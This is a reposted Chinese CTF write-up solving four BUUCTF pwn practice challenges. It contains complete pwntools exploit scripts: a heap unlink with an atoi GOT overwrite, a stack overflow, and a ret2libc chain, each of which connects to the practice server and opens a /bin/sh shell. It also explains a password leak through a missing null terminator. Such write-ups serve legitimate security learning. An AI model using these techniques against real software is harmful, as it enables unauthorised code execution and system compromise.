當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

PWN-PRACTICE-BUUCTF-22

發(fā)布時(shí)間：2023/12/10 编程问答 22 豆豆

生活随笔收集整理的這篇文章主要介紹了 PWN-PRACTICE-BUUCTF-22 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

PWN-PRACTICE-BUUCTF-22

- hitcontraining_unlink
- picoctf_2018_leak_me
- suctf_2018_basic pwn
- axb_2019_brop64

hitcontraining_unlink

unlink，參考：[BUUCTF]PWN——hitcontraining_unlink

# -*- coding:utf-8 -*- from pwn import * #io=process("./bamboobox") io=remote("node4.buuoj.cn",25178) elf=ELF("./bamboobox") libc=ELF("./libc-2.23-16-x64.so")def show():io.sendlineafter("Your choice:","1") def add(name_len,name):io.sendlineafter("Your choice:","2")io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the name of item:",name) def edit(index,name_len,name):io.sendlineafter("Your choice:","3")io.sendlineafter("the index of item:",str(index))io.sendlineafter("the length of item name:",str(name_len))io.sendlineafter("the new name of the item:",name) def free(index):io.sendlineafter("Your choice:","4")io.sendlineafter("the index of item:",str(index)) def exit():io.sendlineafter("Your choice:","5")#gdb.attach(io) #pause()add(0x40,"aaaa") add(0x80,"bbbb") add(0x80,"cccc")#pause()ptr=0x00000000006020C8 fd=ptr-0x18 bk=ptr-0x10 payload=p64(0)+p64(0x40)+p64(fd)+p64(bk) payload=payload.ljust(0x40,"A") payload+=p64(0x40)+p64(0x90) edit(0,len(payload),payload)#pause()free(1)#pause()atoi_got=elf.got["atoi"] payload=p64(0)*2+p64(0x40)+p64(atoi_got) edit(0,len(payload),payload)#pause()show() io.recvuntil("0 : ") atoi_addr=u64(io.recv(6).ljust(8,"\x00")) print("atoi_addr=="+hex(atoi_addr)) libc_base=atoi_addr-libc.sym["atoi"] system=libc_base+libc.sym["system"]#pause()edit(0,0x08,p64(system))#pause()io.sendlineafter("Your choice:","/bin/sh\x00")io.interactive()

picoctf_2018_leak_me

v5字符數(shù)組大小為256，在后面高地址處跟著的是s字符數(shù)組，程序會(huì)讀取password.txt到s
后面有一句puts(v5)，puts遇到"\x00"才會(huì)停止打印
將v5的256個(gè)字符全部填充為"a"，沒有回車"\n"，就不會(huì)在結(jié)尾設(shè)置"\x00"
puts(v5)的時(shí)候就可以將password打印出來

再次nc到服務(wù)器，輸入正確的密碼即可得到flag

suctf_2018_basic pwn

棧溢出

from pwn import * #io=process('./SUCTF_2018_basic_pwn') io=remote('node4.buuoj.cn',26502) flag_addr=0x401157 payload='a'*(0x110+8)+p64(flag_addr) io.sendline(payload) io.interactive()

axb_2019_brop64

棧溢出，ret2libc

from pwn import * context.log_level="debug" #io=process('./axb_2019_brop64') io=remote('node4.buuoj.cn',29347) elf=ELF('./axb_2019_brop64') libc=ELF('./libc-2.23-x64.so') main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 io.recvuntil('Please tell me:') payload='a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main) io.sendline(payload)puts_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) libc_base=puts_addr-libc.sym['puts'] system=libc_base+libc.sym['system'] binsh=libc_base+libc.search('/bin/sh\x00').next()io.recvuntil('Please tell me:') payload='a'*0xd8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main) io.sendline(payload)io.interactive()

總結(jié)

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-22的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇：浦发随借金逾期一天浦发万用随借金逾期一
下一篇： Scala学习